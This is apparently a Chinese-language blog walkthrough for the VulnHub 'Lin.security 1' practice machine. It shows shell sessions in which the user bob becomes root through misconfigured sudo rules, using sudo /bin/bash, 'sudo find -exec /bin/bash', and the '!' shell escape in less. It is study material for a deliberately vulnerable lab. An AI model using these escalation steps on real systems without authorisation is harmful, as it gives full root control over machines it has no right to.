【Vulnhub通关】Lin.security


准备工作

靶机基本信息

靶机名称:Lin.security 1
操作系统:Linux
网络连接方式:桥接至物理网络
渗透测试目标:提权至root用户
靶机登录信息:bob/secret

下载地址:1. Lin.Security: 1 ~ VulnHub

2. vulnhub靶机_免费高速下载|百度网盘-分享无限制(推荐VMware版)

环境配置

从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Lin.security.ovf文件打开后即可导入靶机。使用上面给出的登录凭据即可登录系统进行提权练习。

P.S. 本台靶机只有权限提升部分哦~


权限提升

本地信息收集

登录系统之后,首先上传LinPeas工具进行信息收集。

系统基本信息

部分CVE漏洞信息

容器软件信息

系统进程信息

计划任务信息

系统用户信息

特殊权限文件

Sudo命令

bash提权

因为使用sudo命令之后发现可以运行各种终端,因此我们可以直接使用sudo运行终端软件提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

常用命令提权

除了各种终端软件,我们还可以使用诸如awkfind这种命令进行提权。下面介绍find命令提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo find . -exec /bin/bash \; -quit
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

find命令有一个可以用于执行任意系统命令的危险参数-exec 这里允许使用sudo运行find命令,因此该命令会以root权限执行/bin/bash

文本分页查看工具提权

一些可以分页查看文本的工具,诸如lessmoreman等,在其文本查看界面可以使用!符号执行系统命令,但前提是必须使用这些工具查看大文件(如/var/log/syslog),这样才能触发它们的分页查看功能。

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo less /var/log/syslog
[sudo] password for bob: 
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

本次靶机渗透到此结束

相关推荐
galaxylove7 分钟前
Gartner发布CISO人工智能安全指南:将AI安全治理融入所有网络安全治理体系
人工智能·安全·web安全
小曹要微笑9 分钟前
MPU (Memory Protection Unit) 详解(嵌入式系统安全与可靠性的核心守护者)
安全·系统安全
414a2 小时前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程
linux·安全·web安全·网络安全·lingjing·灵境
Black蜡笔小新3 小时前
视频汇聚平台EasyCVR赋能石油管道计量站精准监控与安全管理
安全·音视频
Token_w4 小时前
openGauss:全密态数据库的金融级安全实践
数据库·安全·金融
ocr_ww7 小时前
护照阅读器,不止识读护照、多种证件识别、安全特征检测
安全·智能硬件
虚伪的空想家7 小时前
KVM的ubuntu虚机如何关闭安全启动
linux·安全·ubuntu
独行soc12 小时前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
YangYang9YangYan13 小时前
网络安全专业职业能力认证发展路径指南
大数据·人工智能·安全·web安全
小五传输14 小时前
常用的文件摆渡系统:让数据安全高效跨越网络界限
大数据·运维·安全